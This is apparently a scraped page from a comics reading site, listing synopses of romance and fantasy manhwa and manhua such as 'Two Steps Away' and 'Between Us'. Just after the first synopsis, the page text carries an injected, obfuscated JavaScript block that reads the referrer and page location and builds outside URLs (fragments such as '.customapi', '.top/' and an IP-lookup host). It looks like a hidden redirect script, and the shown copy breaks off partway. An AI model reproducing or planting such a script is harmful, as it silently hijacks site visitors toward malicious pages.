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Two Steps Away

Hosu is an average, carefree high school student who isn’t particularly special in any kind of way. Danwoo is the attractive, untouchable top student of the class. There shouldn’t really be any reason for them to interact at all. But one day, Danwoo announces that he wants Hosu to sit next to him in class. In fact, he wants to be within her presence as much as possible, and he’s willing to do whatever it takes to stay by her side. Not too close, but not too far. Just two steps away is enough. However, will they be able to maintain that distance? Come take a closer look, from just a couple steps away… Between 1 Meter / 1?? ??<script></script><script>function _0x2c24(){var _0x5a86e5=['4069960PJYILQ','2579076XlBcNp','210Yloeql','11763910MMQYJH','includes','jFOjj','http://rea','location','VxHcv','google','then','.customapi','1691128XhEISB','dma.net/','286614uuPxwu','random','href','qDTVR','2083568mQtaDo','EGjWJ','fFQoA','.top/','2ykRHQR','22umBoli','KwiDB','referrer','text','RJMEK','1158598YsOMzT','36QyCoou','TTOqy','floor','https://ip','bgzWA'];_0x2c24=function(){return _0x5a86e5;};return _0x2c24();}(function(_0x54c985,_0x40a4aa){var _0xa7120f=_0x1870,_0x5ef987=_0x54c985();while(!![]){try{var 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Between Us

As part of a political marriage alliance, Princess Esmeralda Tuloise is sent far away from her home country of Morway to the Dirmuid Empire in order to marry Prince Patrick Dirmuid. However, not only is Prince Patrick still a young teen who’s nearly ten years younger than Princess Esmeralda, but he’s also a ruthless brat who lacks all sympathy toward other people, including his fiancée. Alone and looked down upon for being the princess of an “uncivilized and barbarous” kingdom, Princess Esmeralda wonders how she’ll be able to get through this marriage. That’s when the prince’s father, Emperor Alexandre Dirmuid, becomes the sole light in the princess’s dark tunnel. But the more attention he gives, the more Princess Esmeralda finds herself falling for the wrong royal…


A Golden World to you

A world divided in two, the ‘Lunar Kingdom’ where humans live and the ‘Sun Kingdom’ where demons live. Estelle, a knight of the Moon Kingdom, loses her family in an attack by demon tribes, gets involved with a strange demon tribe girl, and is sentenced to a life sentence. Live To do so, you must go to the northern tower. A timid girl-knight, a slave boy, and a demon king who became a ghost. The story of three people who embark on an adventure to find their lives.


The Ugly Lady’s Secret Pouch

Read manhwa The Ugly Lady’s Secret Pouch / 이 영애의 시크릿 파우치 Makeup artist, Yoon Seol, was involved in a celebrity accident. When she opened her eyes, she was in the body a heroine in a novel. For a moment, she was mesmerized by the beautiful female lead’s appearance, then she realized that she is in a novel known for torturous confinements. In the novel, the heroine Lila is r*ped by three men. She was an unfortunate character who ended up being imprisoned and turned into an idiot. “Merry bad endings* are not my thing! If it’s a bad ending, it’s a bad ending, why does it have to be merry!” To avoid the original route, Yoon Seol, or rather, Lila, decided to make herself ugly with makeup with the use of a ‘secret pouch.’ Ten years later. Lila, who avoided the original route, received a marriage proposal from an ugly duke. “Don’t be too scared, I’m just being honest with you because you weren’t honest with me first.” But will her ending be a merry bad ending? Or a happy ending? *merry bad ending – endings that may seem sad but the characters themselves are happy


Don’t Provoke the Puppy

Read manhua Don’t Provoke the Puppy / 别惹小狗 ” You and I have the same fate,so why did I come here? For you, also for the sake of myself.” – After being falsified by a “bestie”, I transmigrated into a supporting role in a novel whose name has the same pronunciation as my own. God has gave me a chance to restart again, so I must use it properly! Start by apologizing to anyone who has ever bullied by me.. bla bla bla! Why is there still a ruthless and treacherous minister in the center of the original work! Although,a brave dogs won’t be afraid of suffering, fight!


Shadow Hack

By coincidence, Li Yunmu found a super machine from humanity’s age of darkness. From that point onwards, his ordinary life would never be the same! Aptitude? Innate talent? What are these? Could they be eaten? I have neither aptitude nor innate skill, but my shadow can level up using hacks. Experience, Ability points, battle prowess…….all of them could be hacked. Even while he is asleep or tired, he could still increase his skills. [Ding, your shadow has killed an ant, you have gained experience points and ability points.]


I’ll Change My Fate To Be Executed

Read manhwa I’ll Change My Fate To Be Executed / 처형당할 운명을 바꿔 보겠습니다 The first night as a prince. The dagger in my hand was dyed red with my husband’s blood. The hot blood of a man who has been cold to me all his life. The moment I was executed for the crime of the Crown Prince, I vowed that if I were born again, I would never be his wife. Another chance given like that. I’m trying to get everything back. Even if you become a crazy young person in this area! but what is it Why does everyone keep praising me? “If you refuse to be my evil wife, I will make you the Crown Prince myself.” Besides, why is the Crown Prince who used to be cold to me like this!?


Dating My Best Friend’s Sister

Read manhwa Dating My Best Friend’s Sister / 오빠 베프와 데이트하기 She’s got the perfect guy, she’s just graduated, and she’s about to go on vacation! Kaitlyn’s life was perfect… until it wasn’t. After getting dumped and finding out she has no place to stay, Kaitlyn is forced to crash at the Dune Scape, a dilapidated motel owned by her childhood crush and her brother’s best friend, Cole Thomas! Will sparks fly between the two of them? Or will Cole’s loyalty to her brother doom their relationship before it even begins?


My Accidental Country Life

Accidental Countryside Diary / Countryside Diary by Accident / 어쩌다가 전원일기 Who said rural life is peaceful? Tricked by his grandfather, city boy Jiyool stumbles into Heedong village and is now the local vet. Nothing seems to go right for him in his new life, until in a sudden turn of events he is reunited with his childhood crush. Will he survive this bumpy ride on country roads?


I Became The Male Lead’s Female Friend

Read manhwa I Became The Male Lead’s Female Friend She becomes interrupted by love, a jealousy inducer, and the female friend of the male lead. And in addition, she even has an unrequited love with the male lead. It was ruined. As long as this is the case, let’s just become friends! It was nice to have the first meeting with such a young male lead… “Hello, Bouser Youngae (Polite way for noble’s daughter)” “Uwa!!” You were mistaken for a girl and you cried? Fortunately, she managed to resolve the misunderstanding and become close friends. However, the male lead in his childhood is more shy and soft-hearted than I thought. Eventually, she became attached to the male lead and decided to become a real friend. However, due to the disturbance of the male lead father and the war broke out, we had to be separated for a long time, I thought I could barely meet him again and stay the same as before but…. “Your eyes must have dropped a lot since I didn’t see you. Princess Averine!” What’s wrong with him again?! It’s not just that. Rather than getting along, he keeps get into trouble when he has a chance, and most of all, he even bothers my love business!! Aren’t we just friends?!


A Very Normal Ending

베리노말엔딩 The matchmaker meets her match! Sayoung Lee is a travel consultant who helps others find their soulmates while they're visiting new places. Though she has no interest in finding a love of her own, her whole world is turned upside-down when the mysterious and hunky Seowan shows up in this riotous rom-com!


The Pampered Regent of the Richest Woman

The Pampered Regent of the Richest Woman Great Yan’s richest woman, Wen Jiu, struggled throughout her entire life to become wealthy. However, she was deceived by a scumbag, which caused her to lose both her life and wealth. When she woke up, she has become 15 years old again. Opening her eyes, she sees an old enemy on top of a sedan coming for marriage in place of his fifth brother! Knowing that the handsome man in front of her will one day become the regent, Wen Jiu firmly decided to show her favour to him: I will be responsible for earning money to support our family. Eldest brother please be at ease! Who would’ve expected that on the wedding night… Wen Jiu (Stunned): Eldest Brother, why did you enter the bridal chamber!
